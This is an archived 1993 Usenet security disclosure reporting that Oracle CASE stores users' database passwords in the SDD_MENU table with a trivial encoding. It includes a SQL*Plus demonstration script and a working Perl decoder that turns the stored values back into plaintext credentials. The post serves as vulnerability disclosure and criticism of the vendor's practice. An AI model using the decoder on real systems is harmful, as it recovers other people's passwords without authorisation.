Oracle CASE saves passwords to DB [security]

From: Allu Helenius <ahe_at_th.tele.fi>
Date: 15 Sep 93 11:17:35 GMT
Message-ID: <ahe.748091855_at_th.tele.fi>

Howdy,

While I was installing Oracle CASE (Dictionary 5.0.11.13.3 and Designer 1.1.21.5.0), I noticed that some parts of the CASE products exchange Oracle passwords via database. Saving passwords is something you never do, not even in encoded form like this example!!

I browsed CASE*Dictionary Reference Guide and Administration Guide to see if this bug was documented, but found nothing. Is it somewhere else, I don't know. But I doubt.

Try this to check whether your version of CASE contains this feature:

$ casedict -ins
CASE*Dictionary (TM): Version 5.0.22.6.0 - Production on Wed Sep 15 15:19:42 1993

Usage: casedict -ins name/passwd report

With -ins option CASE*Dictionary saves name/passwd for report report to column MU_ID of table SDD_MENU. Here is a SQL*Plus script to demonstrate what happens: ('arkki' is a oracle user name)

    set heading off feedback off
    column mu_id format a40
    grant connect to arkki identified by CASE;
!casedict -ins arkki/CASE myreport >/dev/null
    select 'CASE',mu_id from sdd_menu where mu_block='myreport';     grant connect to arkki identified by dIcTioNarY;
!casedict -ins arkki/dIcTioNarY myreport >/dev/null
    select 'dIcTioNarY',mu_id from sdd_menu where mu_block='myreport';     grant connect to arkki identified by STINKS;
!casedict -ins arkki/STINKS myreport >/dev/null
    select 'STINKS',mu_id from sdd_menu where mu_block='myreport';

Here is the shortened output of the script:

    CASE [g`\g/=0O_at_
    dIcTioNarY [g`\g/^8_OcdCRpY
    STINKS [g`\g/MCEIEH

I used about fifteen minutes to analyze this (and some other) output and to write this perl script, which decodes these passwords:

    #!/usr/bin/perl
    # CASE password decoder, Allu Helenius 1993
    # - see how easy it is

_at_key=split(//,";662?A;0=<");
push(_at_key,_at_key,_at_key,_at_key); # enough..

while (<>) {

      chop;
      _at_c = split(//);
      _at_p=();
      for ($i=0; $i<_at_c; $i++) {
        push(_at_p,pack("C",ord(@c[$i])+ord("A")-ord(@key[$i])));
      }
      print _at_p,"\n";

}

Here are the passwords above opened:

$ ./crackcasepass

    [g`\g/=0O_at_
    arkki/CASE
    [g`\g/^8_OcdCRpY
    arkki/dIcTioNarY
    [g`\g/MCEIEH
    arkki/STINKS

I've published this information in order to give a security lesson to Oracle's programmers. This is not the way to make a secure systems!! Security through obscurity isn't security at all!!

Oh, one more thing. Casedict's usage says there's an option:

-z Don't store the password.

What is it? Is there a default always to save the password? Oh no... Well, whatever it is, it does not affect the example above, because its CASE*Designer Entity Relationship Diagrammer's Reports which at least call 'casedict -ins'...

Happy computing,

Allu

--
Allu Helenius, Telecom Finland

The platform Oracle works best is 35mm slide projector.

Received on Wed Sep 15 1993 - 13:17:35 CEST

This message: [ Message body ]
Next message: Frank Lenzen: "RECURSIVE QUERYING IN ORACLE7 ???"
Previous message: Thomas Hoberg: "What operations are defined on BLOBs?"
Next in thread: branigan d: "Re: Oracle CASE saves passwords to DB [security]"
Reply: branigan d: "Re: Oracle CASE saves passwords to DB [security]"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ]

Original text of this message